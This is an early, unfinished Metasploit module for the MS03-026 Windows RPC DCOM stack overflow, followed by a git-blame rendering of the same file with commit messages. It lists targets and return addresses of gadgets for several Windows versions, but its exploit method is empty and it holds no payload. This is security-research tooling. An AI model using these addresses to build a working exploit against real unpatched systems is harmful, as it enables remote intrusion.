metasploit-framework/modules/exploits/windows/msrpc_dcom_ms03_026.rb

require 'msf/core'

module Msf

class Exploit::Remote::MSRPC_DCOM_MS03_026 < Msf::Exploit::Remote

	#
	# This module exploits a vulnerability in a DCERPC service
	#
	include Exploit::Remote::DCERPC

	def initialize
		super(
			'Name'          => 'Microsoft RPC DCOM MSO3-026',
			'Description'   => 	
				"This module exploits a stack overflow in the RPCSS service, this vulnerability" +
				"was originally found by the Last Stage of Delirium research group and has been" +
				"widely exploited ever since. This module can exploit the English versions of " +
				"Windows NT 4.0 SP3-6a, Windows 2000, Windows XP, and Windows 2003 all in one request :)",
			'Author'        => [ 'hdm', 'spoonm' ],
			'Version'       => '$Revision$',
			'Refs'          =>
				[
					[ 'OSVDB', '2100'     ],
					[ 'MSB',   'MS03-026' ],
				],
			'Privileged'    => true,
			'Targets'       => 
				[
					# Target 0: Universal
					[ 
						'Windows NT SP3-6a/2000/XP/2003 Universal',
						{
							'Platform' => 'win',
							'Rets'     => 
								[
									0x74ff16f3, # Windows NT 4.0 SP3/4 (pop pop ret) rnr20.dll
									0x776a240d, # Windows NT 4.0 SP5 (eax) ws2help.dll
									0x77f33723, # Windows NT 4.0 SP6a (esp)
									0x7ffde0eb, # Windows 2000 writable address + jmp+0xe0
									0x0018759f, # Windows 2000 Universal (ebx)
									0x01001c59, # Windows XP | XP SP0/SP1 (pop/pop/ret)
									0x001b0b0b, # Windows 2003 call near [ebp+0x30] (unicode.nls)
								],
						},
					],
				],
			'DefaultTarget' => 0)
	end

	def exploit
	end

end

end
motisha4lif git-svn-id: file:///home/svn/incoming/trunk@2691 4d416f70-5f16-0410-b530-b9f4589650da 2005-07-09 23:22:32 +02:00			`require 'msf/core'`
moved git-svn-id: file:///home/svn/incoming/trunk@2575 4d416f70-5f16-0410-b530-b9f4589650da 2005-06-05 06:37:48 +02:00
			`module Msf`

can I get a woot woot git-svn-id: file:///home/svn/incoming/trunk@2576 4d416f70-5f16-0410-b530-b9f4589650da 2005-06-05 07:42:14 +02:00			`class Exploit::Remote::MSRPC_DCOM_MS03_026 < Msf::Exploit::Remote`

			`#`
			`# This module exploits a vulnerability in a DCERPC service`
			`#`
			`include Exploit::Remote::DCERPC`
moved git-svn-id: file:///home/svn/incoming/trunk@2575 4d416f70-5f16-0410-b530-b9f4589650da 2005-06-05 06:37:48 +02:00
			`def initialize`
			`super(`
			`'Name' => 'Microsoft RPC DCOM MSO3-026',`
			`'Description' =>`
			`"This module exploits a stack overflow in the RPCSS service, this vulnerability" +`
			`"was originally found by the Last Stage of Delirium research group and has been" +`
			`"widely exploited ever since. This module can exploit the English versions of " +`
			`"Windows NT 4.0 SP3-6a, Windows 2000, Windows XP, and Windows 2003 all in one request :)",`
			`'Author' => [ 'hdm', 'spoonm' ],`
			`'Version' => '$Revision$',`
			`'Refs' =>`
			`[`
			`[ 'OSVDB', '2100' ],`
			`[ 'MSB', 'MS03-026' ],`
			`],`
can I get a woot woot git-svn-id: file:///home/svn/incoming/trunk@2576 4d416f70-5f16-0410-b530-b9f4589650da 2005-06-05 07:42:14 +02:00			`'Privileged' => true,`
moved git-svn-id: file:///home/svn/incoming/trunk@2575 4d416f70-5f16-0410-b530-b9f4589650da 2005-06-05 06:37:48 +02:00			`'Targets' =>`
			`[`
			`# Target 0: Universal`
			`[`
			`'Windows NT SP3-6a/2000/XP/2003 Universal',`
yoyoyoyoyoy git-svn-id: file:///home/svn/incoming/trunk@2580 4d416f70-5f16-0410-b530-b9f4589650da 2005-06-05 20:03:56 +02:00			`{`
			`'Platform' => 'win',`
			`'Rets' =>`
			`[`
			`0x74ff16f3, # Windows NT 4.0 SP3/4 (pop pop ret) rnr20.dll`
			`0x776a240d, # Windows NT 4.0 SP5 (eax) ws2help.dll`
			`0x77f33723, # Windows NT 4.0 SP6a (esp)`
			`0x7ffde0eb, # Windows 2000 writable address + jmp+0xe0`
			`0x0018759f, # Windows 2000 Universal (ebx)`
			`0x01001c59, # Windows XP \| XP SP0/SP1 (pop/pop/ret)`
			`0x001b0b0b, # Windows 2003 call near [ebp+0x30] (unicode.nls)`
			`],`
			`},`
			`],`
moved git-svn-id: file:///home/svn/incoming/trunk@2575 4d416f70-5f16-0410-b530-b9f4589650da 2005-06-05 06:37:48 +02:00			`],`
can I get a woot woot git-svn-id: file:///home/svn/incoming/trunk@2576 4d416f70-5f16-0410-b530-b9f4589650da 2005-06-05 07:42:14 +02:00			`'DefaultTarget' => 0)`
moved git-svn-id: file:///home/svn/incoming/trunk@2575 4d416f70-5f16-0410-b530-b9f4589650da 2005-06-05 06:37:48 +02:00			`end`

can I get a woot woot git-svn-id: file:///home/svn/incoming/trunk@2576 4d416f70-5f16-0410-b530-b9f4589650da 2005-06-05 07:42:14 +02:00			`def exploit`
			`end`
moved git-svn-id: file:///home/svn/incoming/trunk@2575 4d416f70-5f16-0410-b530-b9f4589650da 2005-06-05 06:37:48 +02:00
			`end`
can I get a woot woot git-svn-id: file:///home/svn/incoming/trunk@2576 4d416f70-5f16-0410-b530-b9f4589650da 2005-06-05 07:42:14 +02:00
moved git-svn-id: file:///home/svn/incoming/trunk@2575 4d416f70-5f16-0410-b530-b9f4589650da 2005-06-05 06:37:48 +02:00			`end`